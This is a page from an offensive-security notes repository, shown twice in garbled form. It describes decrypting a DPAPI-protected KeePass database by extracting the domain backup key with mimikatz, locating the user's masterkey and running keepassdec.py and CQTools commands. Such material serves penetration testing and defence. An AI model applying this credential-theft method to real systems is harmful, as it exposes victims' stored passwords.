killchain-compendium/Exploits/Windows/DPAPI.md

# DPAPI

* [Jarno Baselier](https://jarnobaselier-nl.translate.goog/crack-dpapi-met-cqure-cqtools/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=nui)
* [Insecurity's take](https://www.insecurity.be/blog/2020/12/24/dpapi-in-depth-with-tooling-standalone-dpapi/#The_DPAPILAB-NG_Toolset)
* [tinyapps' replace and recover domian cached credentials](https://tinyapps.org/docs/domain-cached-credentials.html)
* [ired's reading dpapi encrypted secrets with mimikatz and c++](https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++)

## Tools

* [tjldeneut's dpaping-lab](https://github.com/tijldeneut/dpapilab-ng.git)
* [BlackDiverX's unpacked cqtools]( https://github.com/BlackDiverX/cqtools)
* Use [CQTools](https://github.com/paulacqure/CQTools.git) with care, __CQMasterKeyAD.exe__ does not work correctly. It will drive you mad. Here is the workaround
Pressuposition is, you want to decrypt a blob with a masterkey, e.g. Keepass which is saved with windows logon DPAPI
    * Get the pvk backup key from the DC via mimikatz
    * Get the entropy via `CQTools/CQDPAPIKeePassDecryptor/CQDPAPIKeePassDBDecryptor.exe`
    * Get the encrypted blob
    * Get the user's Masterkey under `C:\users\<user>\AppData\Roaming\Microsoft\Protect\<SID>\`
    * Use dpapilab-ng's `keepassdec.py`
```sh
./keepassdec.py  --masterkey=path/to/masterkey/ -k /path/to/backup/key/ntds_capi_0_07ea03b4-3b28-4270-8862-0bc66dacef1a.keyx.rsa.pvk  --entropy_hex=<found entropy> --sid=S-1-5-21-555431066-3599073733-176599750-1125 path/to/blob.bin 
```
    * Use the decrypted blob to 
```sh
CQDPAPIKeePassDBDecryptor.exe /k <key> /f <file>.kdbx
```
* Open the `*.kdbx` file
restructured Exploits 2022-11-13 22:38:01 +01:00			`# DPAPI`

			`* [Jarno Baselier](https://jarnobaselier-nl.translate.goog/crack-dpapi-met-cqure-cqtools/?_x_tr_sl=auto&_x_tr_tl=en&_x_tr_hl=en-US&_x_tr_pto=nui)`
			`* [Insecurity's take](https://www.insecurity.be/blog/2020/12/24/dpapi-in-depth-with-tooling-standalone-dpapi/#The_DPAPILAB-NG_Toolset)`
			`* [tinyapps' replace and recover domian cached credentials](https://tinyapps.org/docs/domain-cached-credentials.html)`
			`* [ired's reading dpapi encrypted secrets with mimikatz and c++](https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++)`

			`## Tools`

			`* [tjldeneut's dpaping-lab](https://github.com/tijldeneut/dpapilab-ng.git)`
			`* [BlackDiverX's unpacked cqtools]( https://github.com/BlackDiverX/cqtools)`
			`* Use [CQTools](https://github.com/paulacqure/CQTools.git) with care, __CQMasterKeyAD.exe__ does not work correctly. It will drive you mad. Here is the workaround`
			`Pressuposition is, you want to decrypt a blob with a masterkey, e.g. Keepass which is saved with windows logon DPAPI`
			`* Get the pvk backup key from the DC via mimikatz`
			* Get the entropy via `CQTools/CQDPAPIKeePassDecryptor/CQDPAPIKeePassDBDecryptor.exe`
			`* Get the encrypted blob`
			* Get the user's Masterkey under `C:\users\<user>\AppData\Roaming\Microsoft\Protect\<SID>\`
			* Use dpapilab-ng's `keepassdec.py`
			```sh
			`./keepassdec.py --masterkey=path/to/masterkey/ -k /path/to/backup/key/ntds_capi_0_07ea03b4-3b28-4270-8862-0bc66dacef1a.keyx.rsa.pvk --entropy_hex=<found entropy> --sid=S-1-5-21-555431066-3599073733-176599750-1125 path/to/blob.bin`
			```
			`* Use the decrypted blob to`
			```sh
			`CQDPAPIKeePassDBDecryptor.exe /k <key> /f <file>.kdbx`
			```
			* Open the `*.kdbx` file